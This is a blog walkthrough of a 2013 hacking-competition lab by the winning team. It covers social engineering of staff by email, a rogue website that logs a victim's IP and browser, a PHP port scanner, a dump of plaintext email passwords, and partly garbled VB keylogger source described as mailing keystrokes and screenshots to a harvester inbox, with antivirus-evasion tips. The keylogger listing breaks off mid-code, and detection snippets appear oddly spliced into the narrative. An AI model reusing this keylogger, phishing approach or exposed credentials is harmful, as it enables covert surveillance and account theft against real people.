What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems: I simulate an organized, professional attack against your organization, after which a detailed report summarizes the weaknesses and exploited vectors. This will help you gain control over your infrastructure’s security and maximize your protection.

Monday, March 31, 2014

HACKBATTLE 2013, BREAKING INTO JOAN WOKABI'S LAPTOP



HACKBATTLE2013 TEAM OWNERZ INFO EXTRACT FROM DB AND EMAILS

Team 0wnErz extracting information from phpmyadmin and also from emails









HACKBATTLE 2013 FULL EMAIL RECON BY TEAM OWNERZ

 This is how Team OwnErz were able to initiate conversation with Joan and Daniella








HACKBATTLE 2013 EMAIL ACCESS FROM DATABASE SERVER

Once you gained access to the DB server, you found the email configurations stored there. Testers were mostly expected to get to them through phpMyAdmin.


mysql> use emails;
Database changed
mysql> select * from both_emails;
+----------+----------+-----------+---------------------------+-----------------+
| PersonID | LastName | FirstName | email                     | password        |
+----------+----------+-----------+---------------------------+-----------------+
|        1 | wokabi   | joan      | joan.wokabi@gmail.com     | n@stys4l0nw3b   |
|        2 | daniella | wambuas   | daniell.wambuas@gmail.com | qwerty2014Nasty |
+----------+----------+-----------+---------------------------+-----------------+
2 rows in set (0.00 sec)

mysql>




TARGETING AZANURU FOR MORE INFORMATION, SOCIAL ENGINEERING, HACKBATTLE 2013

By Team 0wnErz, winners of Hackbattle 2013

Learning about the subnets and floating IPs

HACKBATTLE 2013 EMAIL SOCIAL ENGINEERING SNAPSHOTS



Targeting the users was the trick against the Lab

by TeamOwnErz

HACKBATTLE 2013 WALKTHROUGH BY THE WINNERS --TEAM OWN3RZ

HackBattle 2013 WalkThrough

Tutorial by Munir, Ruthie and Ibrahim


The Scenario

The Process

From the above scenario the server looks well protected, but the scenario also shows evidence of workstations which are not behind the same firewall. In team 0wnErz’s case these were the best target, but how to get to them was the tricky bit.

So the starting point was what we see i.e.
http://197.232.19.194

Looking at the site: static HTML, nothing fancy on it and no PHP code, which rules out any possibility of SQL injection, everyone’s juicy cake. Going for the forms: drat, those just send mail too, so there is no PHP form to post to.
The worst you got was directory listing and some failed Adobe gallery scripts missing from the gallery page. Damn, those would have helped us read the logs, as they need that access to work. So what now? Look at what the site has to offer.

Found 2 emails:

Joan.wokabi@gmail.com –Manager  (Home Page)
Daniella.wambuas@gmail.com – IT Staff Manager (About Us Page)

So for now we have 2 managers, a business one and a techie one. From here the push was for the business manager: let’s see if she can help us.
Our first contact was to complain about the lack of user experience on the appointment page, nothing fancy, just to see how she takes it and to gauge our audience. This is how it went.

She replied, and it’s apparent that she does care about user experience. One thing we noted, though: she copied Daniella in the response, who we found out is Daniel, and the email was misspelled on the site. Next came a little more getting to know the whereabouts, and we noticed there is a “database” where we have been recorded. But where?? Nice!!!!!!

A little more talk and she asks for more information about us, and we gladly give our alias, also justifying why our email is not so personalized ;). As we do this and the rapport builds up, Joan mentions something important: she input us in the database and she has access to it. From her email we can also see that there’s an application to manage a database.


I don’t know about you, but most people I know have:
1. phpMyAdmin
2. sqlbuddy

Let’s go with number one, though, and try the most common install directories for the system. Long story short, after a slow trial and error we found a /data directory. Cool, I know, right? Progress finally, but now we need to tread carefully.
Now there are 2 things we can do:
1. Try to exploit the phpMyAdmin
2. Try to trap Joan and compromise Joan’s machine, since she has access
We decided to try both but weigh our chances. So step one was to view the phpMyAdmin.

Also notice test.php. That’s phpinfo, an awesome wealth of information about the server:




Server root: /etc/apache2
webroot: /var/www/
User/Group www-data(33)/33
php version: 5.5.3-1ubuntu2.2
allow_url_fopen On
mysql: 5.5.35
internal IP: 192.168.200.2
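
From the defender's side, the slow directory guessing and the request for test.php described above both end up in the web server's access log. The Python sketch below is an added example, not part of the original walkthrough; the log lines, IP addresses and the PUBLIC_PATHS set are constructed for illustration. It counts distinct 404 paths per client over the whole log instead of measuring request rate, so a patient prober is still caught.

```python
import re
from collections import defaultdict

# Constructed Apache access-log lines. IPs are documentation ranges and the
# probed paths are illustrative; none of this is taken from the lab itself.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2014:09:00:01 +0300] "GET /index.html HTTP/1.1" 200 5120
198.51.100.7 - - [10/Mar/2014:09:00:02 +0300] "GET /favicon.ico HTTP/1.1" 404 209
203.0.113.50 - - [10/Mar/2014:09:10:00 +0300] "GET /phpmyadmin/ HTTP/1.1" 404 289
203.0.113.50 - - [10/Mar/2014:11:40:00 +0300] "GET /pma/ HTTP/1.1" 404 283
203.0.113.50 - - [10/Mar/2014:15:05:00 +0300] "GET /sqlbuddy/ HTTP/1.1" 404 288
203.0.113.50 - - [11/Mar/2014:08:30:00 +0300] "GET /admin/ HTTP/1.1" 404 285
203.0.113.50 - - [11/Mar/2014:13:20:00 +0300] "GET /data/ HTTP/1.1" 200 8342
203.0.113.50 - - [11/Mar/2014:13:25:00 +0300] "GET /test.php HTTP/1.1" 200 71234
198.51.100.7 - - [11/Mar/2014:14:00:00 +0300] "GET /about.html HTTP/1.1" 200 4096
"""

# Assumption: the pages the site actually links to. Anything else that
# answers 200/401/403 is content a visitor had to guess.
PUBLIC_PATHS = {"/", "/index.html", "/about.html"}

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})\b')


def find_forced_browsing(log_text, public_paths, min_misses=4):
    """Return {client_ip: {"probed": [...], "found": [...]}} for clients that
    requested at least `min_misses` distinct non-existent paths.

    "found" lists the unlinked paths that same client got an answer for,
    i.e. what the guessing uncovered and what should be locked down first.
    """
    misses = defaultdict(set)   # ip -> distinct paths answered with 404
    hits = defaultdict(set)     # ip -> unlinked paths that exist
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path, status = m.group(1), m.group(2).split("?")[0], int(m.group(3))
        if status == 404:
            misses[ip].add(path)
        elif status in (200, 401, 403) and path not in public_paths:
            hits[ip].add(path)

    findings = {}
    for ip, missed in misses.items():
        if len(missed) >= min_misses:
            findings[ip] = {"probed": sorted(missed), "found": sorted(hits[ip])}
    return findings


if __name__ == "__main__":
    for ip, info in find_forced_browsing(SAMPLE_LOG, PUBLIC_PATHS).items():
        print(ip, "probed", info["probed"], "and reached", info["found"])
```
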


Back to phpMyAdmin. We are dealing with a version one revision from the latest:

it’s 4.1.8.


What are the odds we will kill this thing and go free? Seeing the prompt tells you that no user goes in without a pass, so we downloaded the same version of phpMyAdmin and installed it on our end. Only one problem: we could create a valid login to a default DB (i.e. mysql), but we couldn’t replay the 4 cookies. As we realized later, this was because the online one lacked mcrypt while ours had it, so our cookie pattern was quite different.

“God Blesses those who put errors on their homepage and this server wasn’t blessed it was cursed!!! ”

So let’s go the Joan way first; if she has access to this we shall know. But we need to be smart about it, so here is the breakdown of the needs:
1. Find Joan’s environment. She must be on one of the workstations: what is she running, what is her address, etc.
2. Come up with a super trap and hook Joan to it, then get enough info to steal her credentials and log in as her.

For the first, team 0wnErz went with making ourselves the competition, so we first acquired a rogue domain (http://spa.oo3.co). We took a few days to make a nice HTML site for a spa but added a bit of PHP code in two sections: the first took her information as she visited the home page and wrote it to a text file, and in case she missed that we had another similar hook that mailed us the information when she submitted a form.
The information we needed most was:
- IP
- Full User Agent information, including OS information, to aid in performing our attack.

The Site:

The script on the homepage had this PHP added to it. It wrote to two files: the first got a summary of just what we needed, and the second got everything, in case there were extras:


So we talked to Joan to check it out ;)

and she did:


So she is on XP and her IP is as shown on screen. Firefox 27, damn, that is a lot of work if we go for a browser attack. But let’s check whether the IP is for a router, a proxy or the actual machine. So we made a simple, non-noisy port scanner:
<?php
// Banner
echo "####################################\n";
echo "Team 0wnErz HB2013 PortScanner\n";
echo "####################################\n\n";

$host = "197.232.19.195";

$ports = array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","3306","3389","5900","8080");
$arrlength = count($ports);

for ($i = 0; $i < $arrlength; $i++) {
    // fsockopen() returns false when the connection is refused
    // or when the 10-second timeout expires.
    $fp = fsockopen($host, $ports[$i], $errno, $errstr, 10);
    if ($fp) {
        echo "port " . $ports[$i] . " open on " . $host . "\n";
        fclose($fp);
    } else {
        echo "port " . $ports[$i] . " closed on " . $host . "\n";
    }
    flush();
}
?>

 
Anyway, as you can see, nothing fancy: fsock is like telnet in PHP :D, only we can run it from our web server online or locally. If it gets blacklisted it is easy to move to another server and continue, but we didn’t... no noise :D
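
What the firewall in front of such a host would record, and how to catch it even though the scan is slow and quiet: the added Python example below (not from the original post) counts distinct destination ports per source/destination pair over a long window instead of measuring rate. The log format, the addresses and the thresholds are assumptions; the port list is the one from the script above.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The 18 ports the page's PHP script walks through.
PAGE_PORTS = [21, 22, 23, 25, 53, 80, 110, 143, 139, 389, 443, 587,
              1352, 1433, 3306, 3389, 5900, 8080]


def build_sample():
    """Constructed firewall log lines (hypothetical key=value format,
    documentation IP ranges). One source walks PAGE_PORTS with 10 s between
    attempts, the scanner's fsockopen timeout; another is an ordinary web
    client that only ever touches 80 and 443."""
    t0 = datetime(2014, 3, 12, 10, 0, 0)
    lines = []
    for i, port in enumerate(PAGE_PORTS):
        ts = (t0 + timedelta(seconds=10 * i)).isoformat()
        lines.append(f"{ts} SRC=203.0.113.80 DST=192.0.2.10 DPT={port} ACTION=DROP")
    for i in range(40):
        ts = (t0 + timedelta(seconds=30 * i)).isoformat()
        port = 80 if i % 2 == 0 else 443
        lines.append(f"{ts} SRC=198.51.100.7 DST=192.0.2.10 DPT={port} ACTION=ACCEPT")
    return lines


def parse(line):
    """Split one log line into (timestamp, src, dst, dport)."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["SRC"], kv["DST"], int(kv["DPT"])


def detect_port_sweeps(lines, window_s=1800, min_ports=10):
    """Return {(src, dst): peak_distinct_ports} for every pair that touched
    at least `min_ports` different ports inside any `window_s`-second span.

    The number of connections is ignored on purpose: a busy web client makes
    many connections to two ports, a sweep makes few connections to many.
    """
    recent = defaultdict(deque)   # (src, dst) -> events still inside the window
    peak = defaultdict(int)       # (src, dst) -> most distinct ports seen at once
    for ts, src, dst, port in sorted(parse(l) for l in lines if l.strip()):
        q = recent[(src, dst)]
        q.append((ts, port))
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        distinct = len({p for _, p in q})
        peak[(src, dst)] = max(peak[(src, dst)], distinct)
    return {pair: n for pair, n in peak.items() if n >= min_ports}


if __name__ == "__main__":
    for (src, dst), n in detect_port_sweeps(build_sample()).items():
        print(f"{src} touched {n} distinct ports on {dst}")
```
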

Interesting: rdesktop is on this thing, and HTTP too, but rdesktop is the important one, so let’s test it.

Windows Server 2003 WTF :D .

OK, someone’s playing us, so part 2 of our attack needs to be smart: we don’t have a very direct target.
 
Since we are dealing with an XP , user agent didn’t lie or rather we chose to believe that but either way we will need a windows payload , windows xp and server 2003 lack elevated desktop so binding some nice application to a keylogger should yield good results.  If you like commercially done keyloggers you can get things like redfox and ardamax etc limitless but nway save yourself the hustle and write some code signature based AV’s won’t have them most probably and keep it on simple logic not complex hooks those get flagged. 
Don’t get jealous ours does :
Screenshots and keys every ten minutes to our harvester email. And keys and apps keys have been trapped from we put our things together the simple way don’t download and run :D.

Note:
You need a harvester email preferably a Gmail one. Easiest to send to.
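
A workstation that mails out captures on a fixed timer, as described above, leaves very regular outbound SMTP connections behind. The added Python example below (not part of the original write-up) flags that regularity in flow records; the record format, the addresses and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev

# SMTP and mail-submission ports. Assumption: workstations on this network
# normally use a corporate relay or webmail, so direct connections from a
# desktop to an outside mail server are already unusual.
MAIL_PORTS = {25, 465, 587}

# Constructed flow records: (epoch seconds, source, destination, dest port).
SAMPLE_FLOWS = (
    # timer-driven sender: one connection roughly every 600 s
    [(t, "10.0.0.23", "192.0.2.25", 587)
     for t in (0, 601, 1199, 1802, 2400, 3001, 3599, 4200)]
    # a person sending mail by hand: irregular gaps
    + [(t, "10.0.0.40", "192.0.2.25", 587)
       for t in (0, 120, 3520, 3565, 10565, 11465)]
    # regular but not mail (for example an update check): ignored
    + [(t, "10.0.0.23", "192.0.2.80", 443) for t in range(0, 4200, 600)]
)


def find_periodic_mailers(flows, min_events=6, max_cv=0.1):
    """Return {(src, dst, dport): mean_gap_seconds} for mail flows whose
    spacing is close to constant.

    Regularity is measured with the coefficient of variation of the gaps
    between consecutive connections (standard deviation / mean). Human mail
    use gives a value well above 1, a timer gives a value near 0.
    """
    times = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport in MAIL_PORTS:
            times[(src, dst, dport)].append(ts)

    flagged = {}
    for key, stamps in times.items():
        if len(stamps) < min_events:
            continue   # too few samples to call anything periodic
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            flagged[key] = round(avg)
    return flagged


if __name__ == "__main__":
    for (src, dst, port), gap in find_periodic_mailers(SAMPLE_FLOWS).items():
        print(f"{src} -> {dst}:{port} every ~{gap} s")
```
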
Here is a snippet from the logic of our keylogger in VB.

‘basic emailer include and simple system output
Imports System.IO
Imports System.Net.Mail
‘ yes if you are asking why the driver declares below its because we want to reduce dependencies and work with what windows already has.
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer, ByVal dwType As Integer) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
‘basic house cleaning for caps and shift key presses so that we accurately record letters as caps or not caps in our main keylogger
Public Function CAPSLOCKON() As Boolean
    If My.Computer.Keyboard.CapsLock = True Then
            Return True
        Else
            Return False
        End If
End Function
Dim mimiNiCapsAmaLa As Integer
Dim Shifter As Integer
‘Keylogger Engine- usually behind your timer ;) ours is a 10 minute space on the highest of our 3 timers and a textbox to pass your data through.
Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey)

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "A"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "a"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "B"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "b"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "C"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "c"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "D"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "d"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "E"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "e"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "F"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "f"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "G"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "g"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "H"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "h"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "I"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "i"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "J"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "j"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "K"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "k"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "L"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "l"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "M"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "m"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "N"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "n"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "O"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "o"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "P"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "p"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Q"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "q"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "R"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "r"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "S"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "s"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "T"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "t"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "U"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "u"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "V"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "v"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "W"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "w"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
